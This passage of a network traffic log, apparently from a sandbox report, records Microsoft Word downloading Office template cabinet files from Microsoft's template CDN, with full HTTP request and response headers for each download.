Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0309043001.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 307348
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: DrxFqg5nzENdB0VDg3H5SA==
Last-Modified: Wed, 29 Aug 2018 18:20:24 GMT
ETag: 0x8D60DDC169CBCB0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 875b64ee-b01e-0079-1097-a05123000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328905.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 20457
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: TvpI7DB+ry+bNGoHPGf8+w==
Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
ETag: 0x8D36AC886167DDF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3e37f31b-801e-0044-5062-b90015000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328908.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31083
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iamBjmZY1zpztkJSL/hwHw==
Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
ETag: 0x8D36AC8865F4922
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7551dfc1-501e-00b3-0597-a02a87000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328919.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 22149
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ZsUZnPT7GL1Pnz8sywdABw==
Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
ETag: 0x8D36AC8871139C3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bd32d8ea-801e-0033-2376-14dfee000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0403393701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 3256855
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iGe99fx1Tanab1ujQTNFlQ==
Last-Modified: Wed, 29 Aug 2018 18:19:43 GMT
ETag: 0x8D60DDBFE4BB50C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1aa38d20-a01e-00b7-6997-a0a780000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328935.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 23597
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: fGRexQWYL+Up0OUDWzeP/A==
Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
ETag: 0x8D36AC887EFBA2F
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 02f022e8-801e-0026-0b97-a0c232000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328940.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 21791
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: e/iLPKIOtx7UU6M2GQjgEA==
Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
ETag: 0x8D36AC8883A8134
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bab20722-a01e-0046-4c1d-22b4c2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328998.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 21357
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: l/W3t+nhKBmZRopcQssS5w==
Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
ETag: 0x8D36AC88A7F05EE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d5cd4d7a-901e-011a-2b97-a015f8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03998159.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 3417042
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: dJw2FeVMjmh1UYz9hOWhsg==
Last-Modified: Fri, 22 Apr 2016 16:11:19 GMT
ETag: 0x8D36AC8BD7E1FE9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c28a3f34-b01e-00c9-0497-a037c7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328951.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 19893
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 75y4vfvAjwO+9RmtZrpkLw==
Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
ETag: 0x8D36AC8888436CF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f60ed86d-c01e-00fc-3b97-a05bd3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp1000111403.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 953453
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 1OrACenntkuLABroK4EC+g==
Last-Modified: Thu, 12 Jul 2018 00:20:10 GMT
ETag: 0x8D5E78D3A9D8C97
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6910c7b5-e01e-00d4-5297-a03a7b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328975.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 22594
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 7gEpx8waySu8PWyw9lP8rg==
Last-Modified: Fri, 22 Apr 2016 16:09:51 GMT
ETag: 0x8D36AC889183E51
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a209c062-f01e-003c-4097-a0a3ed000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328972.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 21111
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 0wrSbbtt7KT90pT0jtrVXQ==
Last-Modified: Fri, 22 Apr 2016 16:09:51 GMT
ETag: 0x8D36AC888CEAFBE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 477f7fba-801e-00a0-169e-b90e8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0403392101.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1881952
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U8X0WyLhM7KNS9O1o1D9vQ==
Last-Modified: Wed, 29 Aug 2018 18:19:46 GMT
ETag: 0x8D60DDC0007D57D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3d2d7040-b01e-0050-5297-a02761000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328983.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 21875
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 5TIDh2JQP/oTcd8D+i4iLQ==
Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
ETag: 0x8D36AC88963C8B3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b450fbbe-c01e-00c3-7c97-a09370000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0403391901.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1097591
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: v5XpZ+fRzsjv5Ca8ASfT3g==
Last-Modified: Wed, 29 Aug 2018 18:16:09 GMT
ETag: 0x8D60DDB7EAA50F0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4b5a1384-701e-0032-6dfb-b98a5d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328990.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 19288
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: uab/cVcZ7p3hZCGrmDynRQ==
Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
ETag: 0x8D36AC88A1DF716
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f9704d59-e01e-0099-4b97-a0f597000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:57 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp03328986.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 22340
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iyn6tQb9ZcIcnNb+a7vBRg==
Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
ETag: 0x8D36AC889AD573C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0b4615e6-601e-0004-20d7-c70d42000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:57 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0345744402.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 295527
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: mgcDXvgCv4n27SVNDbAqsA==
Last-Modified: Wed, 29 Aug 2018 21:59:16 GMT
ETag: 0x8D60DFAA9CC48C3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ea01ec0c-b01e-0110-4a97-a048da000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0345746401.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 276650
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: hNjzhI50JMvjgB+VcOBQGA==
Last-Modified: Wed, 29 Aug 2018 18:16:15 GMT
ETag: 0x8D60DDB824A3C69
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c6460182-001e-00a7-1a97-a0018a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:57 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0345747501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 271273
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IUN4l8m4isLLK7L++SLRkQ==
Last-Modified: Wed, 29 Aug 2018 18:16:49 GMT
ETag: 0x8D60DDB967B9FA5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dacba5b7-401e-0105-2397-a08a43000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0345748501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 2591108
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: vrEqBGTQlsozuupDUs6ADw==
Last-Modified: Wed, 29 Aug 2018 18:18:43 GMT
ETag: 0x8D60DDBDA502B66
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4182b976-401e-0119-4e97-a0f49c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0345749601.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
